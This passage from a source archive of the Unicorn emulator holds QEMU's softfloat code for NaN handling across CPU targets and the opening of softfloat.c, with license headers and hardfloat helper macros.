!is_qnan(b_cls)) { return 0; } else { return aIsLargerSignificand ? 0 : 1; } } else { return 1; } #endif } /*---------------------------------------------------------------------------- | Select which NaN to propagate for a three-input operation. | For the moment we assume that no CPU needs the 'larger significand' | information. | Return values : 0 : a; 1 : b; 2 : c; 3 : default-NaN *----------------------------------------------------------------------------*/ static int pickNaNMulAdd(FloatClass a_cls, FloatClass b_cls, FloatClass c_cls, bool infzero, float_status *status) { #if defined(TARGET_ARM) /* For ARM, the (inf,zero,qnan) case sets InvalidOp and returns * the default NaN */ if (infzero && is_qnan(c_cls)) { float_raise(float_flag_invalid, status); return 3; } /* This looks different from the ARM ARM pseudocode, because the ARM ARM * puts the operands to a fused mac operation (a*b)+c in the order c,a,b. */ if (is_snan(c_cls)) { return 2; } else if (is_snan(a_cls)) { return 0; } else if (is_snan(b_cls)) { return 1; } else if (is_qnan(c_cls)) { return 2; } else if (is_qnan(a_cls)) { return 0; } else { return 1; } #elif defined(TARGET_MIPS) if (snan_bit_is_one(status)) { /* * For MIPS systems that conform to IEEE754-1985, the (inf,zero,nan) * case sets InvalidOp and returns the default NaN */ if (infzero) { float_raise(float_flag_invalid, status); return 3; } /* Prefer sNaN over qNaN, in the a, b, c order. */ if (is_snan(a_cls)) { return 0; } else if (is_snan(b_cls)) { return 1; } else if (is_snan(c_cls)) { return 2; } else if (is_qnan(a_cls)) { return 0; } else if (is_qnan(b_cls)) { return 1; } else { return 2; } } else { /* * For MIPS systems that conform to IEEE754-2008, the (inf,zero,nan) * case sets InvalidOp and returns the input value 'c' */ if (infzero) { float_raise(float_flag_invalid, status); return 2; } /* Prefer sNaN over qNaN, in the c, a, b order. */ if (is_snan(c_cls)) { return 2; } else if (is_snan(a_cls)) { return 0; } else if (is_snan(b_cls)) { return 1; } else if (is_qnan(c_cls)) { return 2; } else if (is_qnan(a_cls)) { return 0; } else { return 1; } } #elif defined(TARGET_PPC) /* For PPC, the (inf,zero,qnan) case sets InvalidOp, but we prefer * to return an input NaN if we have one (ie c) rather than generating * a default NaN */ if (infzero) { float_raise(float_flag_invalid, status); return 2; } /* If fRA is a NaN return it; otherwise if fRB is a NaN return it; * otherwise return fRC. Note that muladd on PPC is (fRA * fRC) + frB */ if (is_nan(a_cls)) { return 0; } else if (is_nan(c_cls)) { return 2; } else { return 1; } #else /* A default implementation: prefer a to b to c. * This is unlikely to actually match any real implementation. */ if (is_nan(a_cls)) { return 0; } else if (is_nan(b_cls)) { return 1; } else { return 2; } #endif } /*---------------------------------------------------------------------------- | Takes two single-precision floating-point values `a' and `b', one of which | is a NaN, and returns the appropriate NaN result. If either `a' or `b' is a | signaling NaN, the invalid exception is raised. *----------------------------------------------------------------------------*/ static float32 propagateFloat32NaN(float32 a, float32 b, float_status *status) { flag aIsLargerSignificand; uint32_t av, bv; FloatClass a_cls, b_cls; /* This is not complete, but is good enough for pickNaN. */ a_cls = (!float32_is_any_nan(a) ? float_class_normal : float32_is_signaling_nan(a, status) ? float_class_snan : float_class_qnan); b_cls = (!float32_is_any_nan(b) ? float_class_normal : float32_is_signaling_nan(b, status) ? float_class_snan : float_class_qnan); av = float32_val(a); bv = float32_val(b); if (is_snan(a_cls) || is_snan(b_cls)) { float_raise(float_flag_invalid, status); } if (status->default_nan_mode) { return float32_default_nan(status); } if ((uint32_t)(av << 1) < (uint32_t)(bv << 1)) { aIsLargerSignificand = 0; } else if ((uint32_t)(bv << 1) < (uint32_t)(av << 1)) { aIsLargerSignificand = 1; } else { aIsLargerSignificand = (av < bv) ? 1 : 0; } if (pickNaN(a_cls, b_cls, aIsLargerSignificand)) { if (is_snan(b_cls)) { return float32_silence_nan(b, status); } return b; } else { if (is_snan(a_cls)) { return float32_silence_nan(a, status); } return a; } } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is a quiet | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float64_is_quiet_nan(float64 a_, float_status *status) { #ifdef NO_SIGNALING_NANS return float64_is_any_nan(a_); #else uint64_t a = float64_val(a_); if (snan_bit_is_one(status)) { return (((a >> 51) & 0xFFF) == 0xFFE) && (a & 0x0007FFFFFFFFFFFFULL); } else { return ((a << 1) >= 0xFFF0000000000000ULL); } #endif } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is a signaling | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float64_is_signaling_nan(float64 a_, float_status *status) { #ifdef NO_SIGNALING_NANS return 0; #else uint64_t a = float64_val(a_); if (snan_bit_is_one(status)) { return ((a << 1) >= 0xFFF0000000000000ULL); } else { return (((a >> 51) & 0xFFF) == 0xFFE) && (a & UINT64_C(0x0007FFFFFFFFFFFF)); } #endif } /*---------------------------------------------------------------------------- | Returns the result of converting the double-precision floating-point NaN | `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid | exception is raised. *----------------------------------------------------------------------------*/ static commonNaNT float64ToCommonNaN(float64 a, float_status *status) { commonNaNT z; if (float64_is_signaling_nan(a, status)) { float_raise(float_flag_invalid, status); } z.sign = float64_val(a) >> 63; z.low = 0; z.high = float64_val(a) << 12; return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the canonical NaN `a' to the double- | precision floating-point format. *----------------------------------------------------------------------------*/ static float64 commonNaNToFloat64(commonNaNT a, float_status *status) { uint64_t mantissa = a.high >> 12; if (status->default_nan_mode) { return float64_default_nan(status); } if (mantissa) { return make_float64( (((uint64_t) a.sign) << 63) | UINT64_C(0x7FF0000000000000) | (a.high >> 12)); } else { return float64_default_nan(status); } } /*---------------------------------------------------------------------------- | Takes two double-precision floating-point values `a' and `b', one of which | is a NaN, and returns the appropriate NaN result. If either `a' or `b' is a | signaling NaN, the invalid exception is raised. *----------------------------------------------------------------------------*/ static float64 propagateFloat64NaN(float64 a, float64 b, float_status *status) { flag aIsLargerSignificand; uint64_t av, bv; FloatClass a_cls, b_cls; /* This is not complete, but is good enough for pickNaN. */ a_cls = (!float64_is_any_nan(a) ? float_class_normal : float64_is_signaling_nan(a, status) ? float_class_snan : float_class_qnan); b_cls = (!float64_is_any_nan(b) ? float_class_normal : float64_is_signaling_nan(b, status) ? float_class_snan : float_class_qnan); av = float64_val(a); bv = float64_val(b); if (is_snan(a_cls) || is_snan(b_cls)) { float_raise(float_flag_invalid, status); } if (status->default_nan_mode) { return float64_default_nan(status); } if ((uint64_t)(av << 1) < (uint64_t)(bv << 1)) { aIsLargerSignificand = 0; } else if ((uint64_t)(bv << 1) < (uint64_t)(av << 1)) { aIsLargerSignificand = 1; } else { aIsLargerSignificand = (av < bv) ? 1 : 0; } if (pickNaN(a_cls, b_cls, aIsLargerSignificand)) { if (is_snan(b_cls)) { return float64_silence_nan(b, status); } return b; } else { if (is_snan(a_cls)) { return float64_silence_nan(a, status); } return a; } } /*---------------------------------------------------------------------------- | Returns 1 if the extended double-precision floating-point value `a' is a | quiet NaN; otherwise returns 0. This slightly differs from the same | function for other types as floatx80 has an explicit bit. *----------------------------------------------------------------------------*/ int floatx80_is_quiet_nan(floatx80 a, float_status *status) { #ifdef NO_SIGNALING_NANS return floatx80_is_any_nan(a); #else if (snan_bit_is_one(status)) { uint64_t aLow; aLow = a.low & ~0x4000000000000000ULL; return ((a.high & 0x7FFF) == 0x7FFF) && (aLow << 1) && (a.low == aLow); } else { return ((a.high & 0x7FFF) == 0x7FFF) && (UINT64_C(0x8000000000000000) <= ((uint64_t)(a.low << 1))); } #endif } /*---------------------------------------------------------------------------- | Returns 1 if the extended double-precision floating-point value `a' is a | signaling NaN; otherwise returns 0. This slightly differs from the same | function for other types as floatx80 has an explicit bit. *----------------------------------------------------------------------------*/ int floatx80_is_signaling_nan(floatx80 a, float_status *status) { #ifdef NO_SIGNALING_NANS return 0; #else if (snan_bit_is_one(status)) { return ((a.high & 0x7FFF) == 0x7FFF) && ((a.low << 1) >= 0x8000000000000000ULL); } else { uint64_t aLow; aLow = a.low & ~UINT64_C(0x4000000000000000); return ((a.high & 0x7FFF) == 0x7FFF) && (uint64_t)(aLow << 1) && (a.low == aLow); } #endif } /*---------------------------------------------------------------------------- | Returns a quiet NaN from a signalling NaN for the extended double-precision | floating point value `a'. *----------------------------------------------------------------------------*/ floatx80 floatx80_silence_nan(floatx80 a, float_status *status) { /* None of the targets that have snan_bit_is_one use floatx80. */ assert(!snan_bit_is_one(status)); a.low |= UINT64_C(0xC000000000000000); return a; } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point NaN `a' to the canonical NaN format. If `a' is a signaling NaN, the | invalid exception is raised. *----------------------------------------------------------------------------*/ static commonNaNT floatx80ToCommonNaN(floatx80 a, float_status *status) { floatx80 dflt; commonNaNT z; if (floatx80_is_signaling_nan(a, status)) { float_raise(float_flag_invalid, status); } if (a.low >> 63) { z.sign = a.high >> 15; z.low = 0; z.high = a.low << 1; } else { dflt = floatx80_default_nan(status); z.sign = dflt.high >> 15; z.low = 0; z.high = dflt.low << 1; } return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the canonical NaN `a' to the extended | double-precision floating-point format. *----------------------------------------------------------------------------*/ static floatx80 commonNaNToFloatx80(commonNaNT a, float_status *status) { floatx80 z; if (status->default_nan_mode) { return floatx80_default_nan(status); } if (a.high >> 1) { z.low = UINT64_C(0x8000000000000000) | a.high >> 1; z.high = (((uint16_t)a.sign) << 15) | 0x7FFF; } else { z = floatx80_default_nan(status); } return z; } /*---------------------------------------------------------------------------- | Takes two extended double-precision floating-point values `a' and `b', one | of which is a NaN, and returns the appropriate NaN result. If either `a' or | `b' is a signaling NaN, the invalid exception is raised. *----------------------------------------------------------------------------*/ floatx80 propagateFloatx80NaN(floatx80 a, floatx80 b, float_status *status) { flag aIsLargerSignificand; FloatClass a_cls, b_cls; /* This is not complete, but is good enough for pickNaN. */ a_cls = (!floatx80_is_any_nan(a) ? float_class_normal : floatx80_is_signaling_nan(a, status) ? float_class_snan : float_class_qnan); b_cls = (!floatx80_is_any_nan(b) ? float_class_normal : floatx80_is_signaling_nan(b, status) ? float_class_snan : float_class_qnan); if (is_snan(a_cls) || is_snan(b_cls)) { float_raise(float_flag_invalid, status); } if (status->default_nan_mode) { return floatx80_default_nan(status); } if (a.low < b.low) { aIsLargerSignificand = 0; } else if (b.low < a.low) { aIsLargerSignificand = 1; } else { aIsLargerSignificand = (a.high < b.high) ? 1 : 0; } if (pickNaN(a_cls, b_cls, aIsLargerSignificand)) { if (is_snan(b_cls)) { return floatx80_silence_nan(b, status); } return b; } else { if (is_snan(a_cls)) { return floatx80_silence_nan(a, status); } return a; } } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is a quiet | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float128_is_quiet_nan(float128 a, float_status *status) { #ifdef NO_SIGNALING_NANS return float128_is_any_nan(a); #else if (snan_bit_is_one(status)) { return (((a.high >> 47) & 0xFFFF) == 0xFFFE) && (a.low || (a.high & 0x00007FFFFFFFFFFFULL)); } else { return ((a.high << 1) >= 0xFFFF000000000000ULL) && (a.low || (a.high & 0x0000FFFFFFFFFFFFULL)); } #endif } /*---------------------------------------------------------------------------- | Returns 1 if the quadruple-precision floating-point value `a' is a | signaling NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float128_is_signaling_nan(float128 a, float_status *status) { #ifdef NO_SIGNALING_NANS return 0; #else if (snan_bit_is_one(status)) { return ((a.high << 1) >= 0xFFFF000000000000ULL) && (a.low || (a.high & 0x0000FFFFFFFFFFFFULL)); } else { return (((a.high >> 47) & 0xFFFF) == 0xFFFE) && (a.low || (a.high & UINT64_C(0x00007FFFFFFFFFFF))); } #endif } /*---------------------------------------------------------------------------- | Returns a quiet NaN from a signalling NaN for the quadruple-precision | floating point value `a'. *----------------------------------------------------------------------------*/ float128 float128_silence_nan(float128 a, float_status *status) { #ifdef NO_SIGNALING_NANS g_assert_not_reached(); #else if (snan_bit_is_one(status)) { return float128_default_nan(status); } else { a.high |= UINT64_C(0x0000800000000000); return a; } #endif } /*---------------------------------------------------------------------------- | Returns the result of converting the quadruple-precision floating-point NaN | `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid | exception is raised. *----------------------------------------------------------------------------*/ static commonNaNT float128ToCommonNaN(float128 a, float_status *status) { commonNaNT z; if (float128_is_signaling_nan(a, status)) { float_raise(float_flag_invalid, status); } z.sign = a.high >> 63; shortShift128Left(a.high, a.low, 16, &z.high, &z.low); return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the canonical NaN `a' to the quadruple- | precision floating-point format. *----------------------------------------------------------------------------*/ static float128 commonNaNToFloat128(commonNaNT a, float_status *status) { float128 z; if (status->default_nan_mode) { return float128_default_nan(status); } shift128Right(a.high, a.low, 16, &z.high, &z.low); z.high |= (((uint64_t)a.sign) << 63) | UINT64_C(0x7FFF000000000000); return z; } /*---------------------------------------------------------------------------- | Takes two quadruple-precision floating-point values `a' and `b', one of | which is a NaN, and returns the appropriate NaN result. If either `a' or | `b' is a signaling NaN, the invalid exception is raised. *----------------------------------------------------------------------------*/ static float128 propagateFloat128NaN(float128 a, float128 b, float_status *status) { flag aIsLargerSignificand; FloatClass a_cls, b_cls; /* This is not complete, but is good enough for pickNaN. */ a_cls = (!float128_is_any_nan(a) ? float_class_normal : float128_is_signaling_nan(a, status) ? float_class_snan : float_class_qnan); b_cls = (!float128_is_any_nan(b) ? float_class_normal : float128_is_signaling_nan(b, status) ? float_class_snan : float_class_qnan); if (is_snan(a_cls) || is_snan(b_cls)) { float_raise(float_flag_invalid, status); } if (status->default_nan_mode) { return float128_default_nan(status); } if (lt128(a.high << 1, a.low, b.high << 1, b.low)) { aIsLargerSignificand = 0; } else if (lt128(b.high << 1, b.low, a.high << 1, a.low)) { aIsLargerSignificand = 1; } else { aIsLargerSignificand = (a.high < b.high) ? 1 : 0; } if (pickNaN(a_cls, b_cls, aIsLargerSignificand)) { if (is_snan(b_cls)) { return float128_silence_nan(b, status); } return b; } else { if (is_snan(a_cls)) { return float128_silence_nan(a, status); } return a; } } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/fpu/softfloat.c������������������������������������������������������������������0000664�0000000�0000000�00001041417�14675241067�0017122�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU float support * * The code in this source file is derived from release 2a of the SoftFloat * IEC/IEEE Floating-point Arithmetic Package. Those parts of the code (and * some later contributions) are provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file after December 1st 2014 will be * taken to be licensed under the Softfloat-2a license unless specifically * indicated otherwise. */ /* =============================================================================== This C source file is part of the SoftFloat IEC/IEEE Floating-point Arithmetic Package, Release 2a. Written by John R. Hauser. This work was made possible in part by the International Computer Science Institute, located at Suite 600, 1947 Center Street, Berkeley, California 94704. Funding was partially provided by the National Science Foundation under grant MIP-9311980. The original version of this code was written as part of a project to build a fixed-point vector processor in collaboration with the University of California at Berkeley, overseen by Profs. Nelson Morgan and John Wawrzynek. More information is available through the Web page `http://HTTP.CS.Berkeley.EDU/~jhauser/ arithmetic/SoftFloat.html'. THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ANY AND ALL LOSSES, COSTS, OR OTHER PROBLEMS ARISING FROM ITS USE. Derivative works are acceptable, even for commercial purposes, so long as (1) they include prominent notice that the work is derivative, and (2) they include prominent notice akin to these four paragraphs for those parts of this code that are retained. =============================================================================== */ /* BSD licensing: * Copyright (c) 2006, Fabrice Bellard * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors * may be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. */ /* Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ /* softfloat (and in particular the code in softfloat-specialize.h) is * target-dependent and needs the TARGET_* macros. */ #include "qemu/osdep.h" #include <math.h> #include "qemu/bitops.h" #include "fpu/softfloat.h" /* We only need stdlib for abort() */ /*---------------------------------------------------------------------------- | Primitive arithmetic functions, including multi-word arithmetic, and | division and square root approximations. (Can be specialized to target if | desired.) *----------------------------------------------------------------------------*/ #include "fpu/softfloat-macros.h" /* * Hardfloat * * Fast emulation of guest FP instructions is challenging for two reasons. * First, FP instruction semantics are similar but not identical, particularly * when handling NaNs. Second, emulating at reasonable speed the guest FP * exception flags is not trivial: reading the host's flags register with a * feclearexcept & fetestexcept pair is slow [slightly slower than soft-fp], * and trapping on every FP exception is not fast nor pleasant to work with. * * We address these challenges by leveraging the host FPU for a subset of the * operations. To do this we expand on the idea presented in this paper: * * Guo, Yu-Chuan, et al. "Translating the ARM Neon and VFP instructions in a * binary translator." Software: Practice and Experience 46.12 (2016):1591-1615. * * The idea is thus to leverage the host FPU to (1) compute FP operations * and (2) identify whether FP exceptions occurred while avoiding * expensive exception flag register accesses. * * An important optimization shown in the paper is that given that exception * flags are rarely cleared by the guest, we can avoid recomputing some flags. * This is particularly useful for the inexact flag, which is very frequently * raised in floating-point workloads. * * We optimize the code further by deferring to soft-fp whenever FP exception * detection might get hairy. Two examples: (1) when at least one operand is * denormal/inf/NaN; (2) when operands are not guaranteed to lead to a 0 result * and the result is < the minimum normal. */ #define GEN_INPUT_FLUSH__NOCHECK(name, soft_t) \ static inline void name(soft_t *a, float_status *s) \ { \ if (unlikely(soft_t ## _is_denormal(*a))) { \ *a = soft_t ## _set_sign(soft_t ## _zero, \ soft_t ## _is_neg(*a)); \ s->float_exception_flags |= float_flag_input_denormal; \ } \ } GEN_INPUT_FLUSH__NOCHECK(float32_input_flush__nocheck, float32) GEN_INPUT_FLUSH__NOCHECK(float64_input_flush__nocheck, float64) #undef GEN_INPUT_FLUSH__NOCHECK #define GEN_INPUT_FLUSH1(name, soft_t) \ static inline void name(soft_t *a, float_status *s) \ { \ if (likely(!s->flush_inputs_to_zero)) { \ return; \ } \ soft_t ## _input_flush__nocheck(a, s); \ } GEN_INPUT_FLUSH1(float32_input_flush1, float32) GEN_INPUT_FLUSH1(float64_input_flush1, float64) #undef GEN_INPUT_FLUSH1 #define GEN_INPUT_FLUSH2(name, soft_t) \ static inline void name(soft_t *a, soft_t *b, float_status *s) \ { \ if (likely(!s->flush_inputs_to_zero)) { \ return; \ } \ soft_t ## _input_flush__nocheck(a, s); \ soft_t ## _input_flush__nocheck(b, s); \ } GEN_INPUT_FLUSH2(float32_input_flush2, float32) GEN_INPUT_FLUSH2(float64_input_flush2, float64) #undef GEN_INPUT_FLUSH2 #define GEN_INPUT_FLUSH3(name, soft_t) \ static inline void name(soft_t *a, soft_t *b, soft_t *c, float_status *s) \ { \ if (likely(!s->flush_inputs_to_zero)) { \ return; \ } \ soft_t ## _input_flush__nocheck(a, s); \ soft_t ## _input_flush__nocheck(b, s); \ soft_t ## _input_flush__nocheck(c, s); \ } GEN_INPUT_FLUSH3(float32_input_flush3, float32) GEN_INPUT_FLUSH3(float64_input_flush3, float64) #undef GEN_INPUT_FLUSH3 /* * Choose whether to use fpclassify or float32/64_* primitives in the generated * hardfloat functions. Each combination of number of inputs and float size * gets its own value. */ #if defined(__x86_64__) # define QEMU_HARDFLOAT_1F32_USE_FP 0 # define QEMU_HARDFLOAT_1F64_USE_FP 1 # define QEMU_HARDFLOAT_2F32_USE_FP 0 # define QEMU_HARDFLOAT_2F64_USE_FP 1 # define QEMU_HARDFLOAT_3F32_USE_FP 0 # define QEMU_HARDFLOAT_3F64_USE_FP 1 #else # define QEMU_HARDFLOAT_1F32_USE_FP 0 # define QEMU_HARDFLOAT_1F64_USE_FP 0 # define QEMU_HARDFLOAT_2F32_USE_FP 0 # define QEMU_HARDFLOAT_2F64_USE_FP 0 # define QEMU_HARDFLOAT_3F32_USE_FP 0 # define QEMU_HARDFLOAT_3F64_USE_FP 0 #endif /* * QEMU_HARDFLOAT_USE_ISINF chooses whether to use isinf() over * float{32,64}_is_infinity when !USE_FP. * On x86_64/aarch64, using the former over the latter can yield a ~6% speedup. * On power64 however, using isinf() reduces fp-bench performance by up to 50%. */ #if defined(__x86_64__) || defined(__aarch64__) # define QEMU_HARDFLOAT_USE_ISINF 1 #else # define QEMU_HARDFLOAT_USE_ISINF 0 #endif /* * Some targets clear the FP flags before most FP operations. This prevents * the use of hardfloat, since hardfloat relies on the inexact flag being * already set. */ #if defined(TARGET_PPC) || defined(__FAST_MATH__) # if defined(__FAST_MATH__) # warning disabling hardfloat due to -ffast-math: hardfloat requires an exact \ IEEE implementation # endif # define QEMU_NO_HARDFLOAT 1 # define QEMU_SOFTFLOAT_ATTR QEMU_FLATTEN #elif !defined(_MSC_VER) # define QEMU_NO_HARDFLOAT 0 # define QEMU_SOFTFLOAT_ATTR QEMU_FLATTEN __attribute__((noinline)) #else // MSVC # define QEMU_NO_HARDFLOAT 0 # define QEMU_SOFTFLOAT_ATTR #endif static inline bool can_use_fpu(const float_status *s) { if (QEMU_NO_HARDFLOAT) { return false; } return likely(s->float_exception_flags & float_flag_inexact && s->float_rounding_mode == float_round_nearest_even); } /* * Hardfloat generation functions. Each operation can have two flavors: * either using softfloat primitives (e.g. float32_is_zero_or_normal) for * most condition checks, or native ones (e.g. fpclassify). * * The flavor is chosen by the callers. Instead of using macros, we rely on the * compiler to propagate constants and inline everything into the callers. * * We only generate functions for operations with two inputs, since only * these are common enough to justify consolidating them into common code. */ typedef union { float32 s; float h; } union_float32; typedef union { float64 s; double h; } union_float64; typedef bool (*f32_check_fn)(union_float32 a, union_float32 b); typedef bool (*f64_check_fn)(union_float64 a, union_float64 b); typedef float32 (*soft_f32_op2_fn)(float32 a, float32 b, float_status *s); typedef float64 (*soft_f64_op2_fn)(float64 a, float64 b, float_status *s); typedef float (*hard_f32_op2_fn)(float a, float b); typedef double (*hard_f64_op2_fn)(double a, double b); /* 2-input is-zero-or-normal */ static inline bool f32_is_zon2(union_float32 a, union_float32 b) { if (QEMU_HARDFLOAT_2F32_USE_FP) { /* * Not using a temp variable for consecutive fpclassify calls ends up * generating faster code. */ return (fpclassify(a.h) == FP_NORMAL || fpclassify(a.h) == FP_ZERO) && (fpclassify(b.h) == FP_NORMAL || fpclassify(b.h) == FP_ZERO); } return float32_is_zero_or_normal(a.s) && float32_is_zero_or_normal(b.s); } static inline bool f64_is_zon2(union_float64 a, union_float64 b) { if (QEMU_HARDFLOAT_2F64_USE_FP) { return (fpclassify(a.h) == FP_NORMAL || fpclassify(a.h) == FP_ZERO) && (fpclassify(b.h) == FP_NORMAL || fpclassify(b.h) == FP_ZERO); } return float64_is_zero_or_normal(a.s) && float64_is_zero_or_normal(b.s); } /* 3-input is-zero-or-normal */ static inline bool f32_is_zon3(union_float32 a, union_float32 b, union_float32 c) { if (QEMU_HARDFLOAT_3F32_USE_FP) { return (fpclassify(a.h) == FP_NORMAL || fpclassify(a.h) == FP_ZERO) && (fpclassify(b.h) == FP_NORMAL || fpclassify(b.h) == FP_ZERO) && (fpclassify(c.h) == FP_NORMAL || fpclassify(c.h) == FP_ZERO); } return float32_is_zero_or_normal(a.s) && float32_is_zero_or_normal(b.s) && float32_is_zero_or_normal(c.s); } static inline bool f64_is_zon3(union_float64 a, union_float64 b, union_float64 c) { if (QEMU_HARDFLOAT_3F64_USE_FP) { return (fpclassify(a.h) == FP_NORMAL || fpclassify(a.h) == FP_ZERO) && (fpclassify(b.h) == FP_NORMAL || fpclassify(b.h) == FP_ZERO) && (fpclassify(c.h) == FP_NORMAL || fpclassify(c.h) == FP_ZERO); } return float64_is_zero_or_normal(a.s) && float64_is_zero_or_normal(b.s) && float64_is_zero_or_normal(c.s); } static inline bool f32_is_inf(union_float32 a) { if (QEMU_HARDFLOAT_USE_ISINF) { return isinf(a.h); } return float32_is_infinity(a.s); } static inline bool f64_is_inf(union_float64 a) { if (QEMU_HARDFLOAT_USE_ISINF) { return isinf(a.h); } return float64_is_infinity(a.s); } /* Note: @fast_test and @post can be NULL */ static inline float32 float32_gen2(float32 xa, float32 xb, float_status *s, hard_f32_op2_fn hard, soft_f32_op2_fn soft, f32_check_fn pre, f32_check_fn post, f32_check_fn fast_test, soft_f32_op2_fn fast_op) { union_float32 ua, ub, ur; ua.s = xa; ub.s = xb; if (unlikely(!can_use_fpu(s))) { goto soft; } float32_input_flush2(&ua.s, &ub.s, s); if (unlikely(!pre(ua, ub))) { goto soft; } if (fast_test && fast_test(ua, ub)) { return fast_op(ua.s, ub.s, s); } ur.h = hard(ua.h, ub.h); if (unlikely(f32_is_inf(ur))) { s->float_exception_flags |= float_flag_overflow; } else if (unlikely(fabsf(ur.h) <= FLT_MIN)) { if (post == NULL || post(ua, ub)) { goto soft; } } return ur.s; soft: return soft(ua.s, ub.s, s); } static inline float64 float64_gen2(float64 xa, float64 xb, float_status *s, hard_f64_op2_fn hard, soft_f64_op2_fn soft, f64_check_fn pre, f64_check_fn post, f64_check_fn fast_test, soft_f64_op2_fn fast_op) { union_float64 ua, ub, ur; ua.s = xa; ub.s = xb; if (unlikely(!can_use_fpu(s))) { goto soft; } float64_input_flush2(&ua.s, &ub.s, s); if (unlikely(!pre(ua, ub))) { goto soft; } if (fast_test && fast_test(ua, ub)) { return fast_op(ua.s, ub.s, s); } ur.h = hard(ua.h, ub.h); if (unlikely(f64_is_inf(ur))) { s->float_exception_flags |= float_flag_overflow; } else if (unlikely(fabs(ur.h) <= DBL_MIN)) { if (post == NULL || post(ua, ub)) { goto soft; } } return ur.s; soft: return soft(ua.s, ub.s, s); } /*---------------------------------------------------------------------------- | Returns the fraction bits of the single-precision floating-point value `a'. *----------------------------------------------------------------------------*/ static inline uint32_t extractFloat32Frac(float32 a) { return float32_val(a) & 0x007FFFFF; } /*---------------------------------------------------------------------------- | Returns the exponent bits of the single-precision floating-point value `a'. *----------------------------------------------------------------------------*/ static inline int extractFloat32Exp(float32 a) { return (float32_val(a) >> 23) & 0xFF; } /*---------------------------------------------------------------------------- | Returns the sign bit of the single-precision floating-point value `a'. *----------------------------------------------------------------------------*/ static inline flag extractFloat32Sign(float32 a) { return float32_val(a) >> 31; } /*---------------------------------------------------------------------------- | Returns the fraction bits of the double-precision floating-point value `a'. *----------------------------------------------------------------------------*/ static inline uint64_t extractFloat64Frac(float64 a) { return float64_val(a) & UINT64_C(0x000FFFFFFFFFFFFF); } /*---------------------------------------------------------------------------- | Returns the exponent bits of the double-precision floating-point value `a'. *----------------------------------------------------------------------------*/ static inline int extractFloat64Exp(float64 a) { return (float64_val(a) >> 52) & 0x7FF; } /*---------------------------------------------------------------------------- | Returns the sign bit of the double-precision floating-point value `a'. *----------------------------------------------------------------------------*/ static inline flag extractFloat64Sign(float64 a) { return float64_val(a) >> 63; } /* * Classify a floating point number. Everything above float_class_qnan * is a NaN so cls >= float_class_qnan is any NaN. */ #ifndef _MSC_VER typedef enum __attribute__ ((__packed__)) { float_class_unclassified, float_class_zero, float_class_normal, float_class_inf, float_class_qnan, /* all NaNs from here */ float_class_snan, } FloatClass; #else __pragma(pack(push, 1)) typedef enum { float_class_unclassified, float_class_zero, float_class_normal, float_class_inf, float_class_qnan, /* all NaNs from here */ float_class_snan, } FloatClass; __pragma(pack(pop)) #endif /* Simple helpers for checking if, or what kind of, NaN we have */ #ifndef _MSC_VER static inline __attribute__((unused)) bool is_nan(FloatClass c) #else static inline bool is_nan(FloatClass c) #endif { return unlikely(c >= float_class_qnan); } #ifndef _MSC_VER static inline __attribute__((unused)) bool is_snan(FloatClass c) #else static inline bool is_snan(FloatClass c) #endif { return c == float_class_snan; } #ifndef _MSC_VER static inline __attribute__((unused)) bool is_qnan(FloatClass c) #else static inline bool is_qnan(FloatClass c) #endif { return c == float_class_qnan; } /* * Structure holding all of the decomposed parts of a float. The * exponent is unbiased and the fraction is normalized. All * calculations are done with a 64 bit fraction and then rounded as * appropriate for the final format. * * Thanks to the packed FloatClass a decent compiler should be able to * fit the whole structure into registers and avoid using the stack * for parameter passing. */ typedef struct { 